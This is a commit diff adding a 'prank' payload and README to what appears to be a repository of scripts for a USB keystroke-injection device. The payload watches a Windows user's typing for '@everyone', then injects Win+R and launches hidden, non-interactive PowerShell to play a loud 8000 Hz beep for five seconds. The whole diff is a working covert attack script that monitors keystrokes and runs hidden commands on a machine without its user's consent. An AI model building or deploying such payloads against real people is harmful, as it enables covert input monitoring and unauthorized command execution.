new payload punish everyone
Punish the user for typing @everyone with a high pitch soundpull/17/head
parent
1974e5fc15
commit
0f1be1919c
|
@ -0,0 +1,17 @@
|
||||||
|
# Title: Punish @Everyone
|
||||||
|
# Description: Punish the user for typing @everyone with a high pitch sound
|
||||||
|
# Author: Cribbit
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: pranks
|
||||||
|
# Target: Windows 7+
|
||||||
|
# Attackmodes: HID
|
||||||
|
# Notes: Beep takes a frequency between 37 and 32767 and a time.
|
||||||
|
|
||||||
|
MATCH (?i)@everyone
|
||||||
|
|
||||||
|
QUACK LOCK
|
||||||
|
QUACK GUI r
|
||||||
|
sleep 5
|
||||||
|
QUACK STRING "powershell -NoP -NonI -W Hidden .([console]::beep(8000,5000))"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK UNLOCK
|
|
@ -0,0 +1,20 @@
|
||||||
|
# Punish @everyone
|
||||||
|
* Author: Cribbit
|
||||||
|
* Version: 1.0
|
||||||
|
* Target: Windows 7+ (Powershell)
|
||||||
|
* Category: pranks
|
||||||
|
* Attackmode: HID
|
||||||
|
|
||||||
|
## Change Log
|
||||||
|
| Version | Changes |
|
||||||
|
| ------- | ------------------------------|
|
||||||
|
| 1.0 | Initial release |
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Punish the user for typing @everyone with a high pitch sound
|
||||||
|
|
||||||
|
## Match
|
||||||
|
(?i)@everyone
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
Beep takes a frequency between 37 and 32767 and a time.
|
Loading…
Reference in New Issue